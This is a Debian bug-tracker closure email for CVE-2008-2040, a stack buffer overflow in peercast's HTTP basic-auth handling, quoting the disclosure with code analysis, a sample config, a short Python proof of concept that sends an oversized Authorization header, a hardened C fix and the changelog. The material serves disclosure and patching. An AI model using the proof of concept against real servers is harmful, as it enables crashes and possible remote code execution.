Your message dated Sat, 26 Jul 2008 09:57:49 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#478573: fixed in peercast 0.1217.toots.20060314-1etch1
has caused the Debian Bug report #478573,
regarding [peercast] CVE-2008-2040 stack-based buffer overflow in HTTP::getAuthUserPass function
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
478573: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=478573
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: peercast
Severity: grave
Tags: security
X-Debbugs-CC: [EMAIL PROTECTED]

I found a security issue in the peercast server in the
HTTP::getAuthUserPass function. I already contacted the upstream author 6 days
ago and didn't get an answer yet so I am publishing this now.

From core/common/http.cpp:

105 void HTTP::getAuthUserPass(char *user, char *pass)
106 {
107         if (arg)
108         {   
109                 char *s = stristr(arg,"Basic");
110                 if (s) 
111                 {   
112                         while (*s)
113                                 if (*s++ == ' ')
114                                         break;
115                         String str;
116                         str.set(s,String::T_BASE64);
117                         str.convertTo(String::T_ASCII);
118                         s = strstr(str.cstr(),":");
119                         if (s) 
120                         {   
121                                 *s = 0;
122                                 if (user)
123                                         strcpy(user,str.cstr());
124                                 if (pass)
125                                         strcpy(pass,s+1);

This function is used if authentication to the peercast server is done by basic
http auth rather than by a cookie. In line 116 the base64 encoded string is copied
into str. Note the set method is peercast's own implementation of set since it
reimplements the String class. set looks like this:

From core/common/sys.h:
38                 MAX_LEN = 256 
...
62         void set(const char *p, TYPE t=T_ASCII)
63         {   
64                 strncpy(data,p,MAX_LEN-1);
65                 data[MAX_LEN-1] = 0;
66                 type = t;
67         }   

In line 117 the string gets decoded and in line 118 and 
following the part before ':' in the decoded string gets copied
into user and the part after it into pass.

From core/common/servhs.cpp:
558 bool Servent::handshakeAuth(HTTP &http,const char *args,bool local)
559 {
560         char user[64],pass[64];
561         user[0] = pass[0] = 0;
...
580         while (http.nextHeader())
581         {   
582                 char *arg = http.getArgStr();
583                 if (!arg)
584                         continue;
585
586                 switch (servMgr->authType)
587                 {   
588                         case ServMgr::AUTH_HTTPBASIC:
589                                 if (http.isHeader("Authorization"))
590                                         http.getAuthUserPass(user,pass);
591                                 break;

user and pass are only declared to have 64 bytes (line 558) while the buffer
used for the copy can store up to MAX_LEN (256) bytes (ok, minus the ':' here).
Servent::handshakeAuth then calls the getAuthUserPass function, triggering a
buffer overflow. It's thus possible to crash the server and execute arbitrary
code if the server allows http-basic authentication.

I already requested a CVE id for this.

An example configuration and PoC is attached.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
[Server]
serverPort = 7144
autoServe = Yes
forceIP = 
isRoot = No
maxBitrateOut = 0
maxRelays = 2
maxDirect = 0
maxRelaysPerChannel = 0
firewallTimeout = 30
forceNormal = No
rootMsg = 
authType = http-basic
cookiesExpire = session
htmlPath = html/en
minPGNUIncoming = 10
maxPGNUIncoming = 20
maxServIn = 50
chanLog = 
networkID = 00000000000000000000000000000000

[Broadcast]
broadcastMsgInterval = 10
broadcastMsg = 
icyMetaInterval = 8192
broadcastID = 008145B5C0427118B595AF7D9E110000
hostUpdateInterval = 180
maxControlConnections = 3
rootHost = yp.peercast.org

[Client]
refreshHTML = 5
relayBroadcast = 30
minBroadcastTTL = 1
maxBroadcastTTL = 7
pushTries = 5
pushTimeout = 60
maxPushHops = 8
autoQuery = 0
queryTTL = 7

[Privacy]
password = s0mep4ss
maxUptime = 0

[Filter]
ip = 255.255.255.255
private = Yes
ban = No
network = Yes
direct = Yes
[End]

[Notify]
PeerCast = Yes
Broadcasters = Yes
TrackInfo = Yes
[End]

[Server1]
allowHTML = Yes
allowBroadcast = Yes
allowNetwork = Yes
allowDirect = Yes
[End]

[Server2]
allowHTML = No
allowBroadcast = Yes
allowNetwork = No
allowDirect = No
[End]

[Debug]
logDebug = No
logErrors = No
logNetwork = No
logChannel = No
pauseLog = No
idleSleepTime = 10

#!/usr/bin/env python

import sys, socket

port = 7144
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'

if(len(sys.argv) < 2):
	print "ERR: please specify a hostname"
	sys.exit(-1)

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((sys.argv[1], port))
	s.send(buff);
except:
	print "ERR: socket()"
	sys.exit(-1)



--- End Message ---
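A hardened version of the split that getAuthUserPass performs after decoding, as an added example in C (not peercast's code and not the patch Debian shipped): the caller passes the sizes of its 64-byte buffers, and a user or password that would not fit is rejected instead of copied. Function names and the constructed inputs are mine; base64 decoding is assumed to have happened already, as String::convertTo does in the original.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Sizes from the report: String::set() caps the decoded credential at
 * MAX_LEN-1 bytes; handshakeAuth's user/pass stack buffers hold 64. */
#define MAX_LEN  256
#define CRED_LEN 64

/* Hardened split of an already base64-decoded "user:pass" string. The
 * original strcpy()s each half into buffers of unknown size; this takes the
 * sizes and returns false when a half would not fit, so nothing is written
 * past either buffer and no silently truncated credential is used. */
bool split_auth_user_pass(const char *decoded, char *user, size_t user_len,
                          char *pass, size_t pass_len)
{
    if (!decoded || !user || !pass || user_len == 0 || pass_len == 0)
        return false;
    const char *colon = strchr(decoded, ':');
    if (!colon)
        return false;                       /* malformed: no separator */
    size_t ulen = (size_t)(colon - decoded);
    size_t plen = strlen(colon + 1);
    if (ulen >= user_len || plen >= pass_len)
        return false;                       /* would overflow: reject */
    memcpy(user, decoded, ulen);
    user[ulen] = '\0';
    memcpy(pass, colon + 1, plen);
    pass[plen] = '\0';
    return true;
}

/* Mirrors the call site: fixed 64-byte stack buffers, now passed with their
 * sizes. Input is constructed: user of ulen bytes, ':', password of plen
 * bytes, bounded the way String::set() bounds what the decoder hands over. */
bool accept_cred_of_lengths(size_t ulen, size_t plen)
{
    char decoded[MAX_LEN], user[CRED_LEN], pass[CRED_LEN];
    if (ulen + 1 + plen > MAX_LEN - 1)
        return false;
    memset(decoded, 'u', ulen);
    decoded[ulen] = ':';
    memset(decoded + ulen + 1, 'p', plen);
    decoded[ulen + 1 + plen] = '\0';
    return split_auth_user_pass(decoded, user, sizeof user, pass, sizeof pass);
}
```

With the original strcpy() calls, accept_cred_of_lengths(0, 200) would write about 137 bytes past pass; here it simply returns false.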
--- Begin Message ---
Source: peercast
Source-Version: 0.1217.toots.20060314-1etch1

We believe that the bug you reported is fixed in the latest version of
peercast, which is due to be installed in the Debian FTP archive:

libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/libpeercast0-dev_0.1217.toots.20060314-1etch1_amd64.deb
libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/libpeercast0_0.1217.toots.20060314-1etch1_amd64.deb
peercast-handlers_0.1217.toots.20060314-1etch1_all.deb
  to pool/main/p/peercast/peercast-handlers_0.1217.toots.20060314-1etch1_all.deb
peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/peercast-servent_0.1217.toots.20060314-1etch1_amd64.deb
peercast_0.1217.toots.20060314-1etch1.diff.gz
  to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1.diff.gz
peercast_0.1217.toots.20060314-1etch1.dsc
  to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1.dsc
peercast_0.1217.toots.20060314-1etch1_amd64.deb
  to pool/main/p/peercast/peercast_0.1217.toots.20060314-1etch1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Romain Beauxis <[EMAIL PROTECTED]> (supplier of updated peercast package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


Format: 1.7
Date: Sun, 18 May 2008 03:28:44 +0200
Source: peercast
Binary: libpeercast0 peercast-handlers peercast-servent peercast 
libpeercast0-dev
Architecture: source amd64 all
Version: 0.1217.toots.20060314-1etch1
Distribution: stable-security
Urgency: low
Maintainer: Romain Beauxis <[EMAIL PROTECTED]>
Changed-By: Romain Beauxis <[EMAIL PROTECTED]>
Description: 
 libpeercast0 - P2P audio and video streaming server libraries
 libpeercast0-dev - P2P audio and video streaming server -- development
 peercast   - P2P audio and video streaming server metapackage
 peercast-handlers - P2P audio and video streaming handlers
 peercast-servent - P2P audio and video streaming servent
Closes: 478573
Changes: 
 peercast (0.1217.toots.20060314-1etch1) stable-security; urgency=low
 .
   * Fixed CVE-2008-2040:
     | stack-based buffer overflow in the
     | HTTP::getAuthUserPass function leading
     | to remote DoS or arbitrary code execution
     | if peercast is configured to use http-basic
     | authentication
     Closes: #478573
   Thanks to Nico Golde <[EMAIL PROTECTED]> for reporting and fixing
   the issue.




--- End Message ---
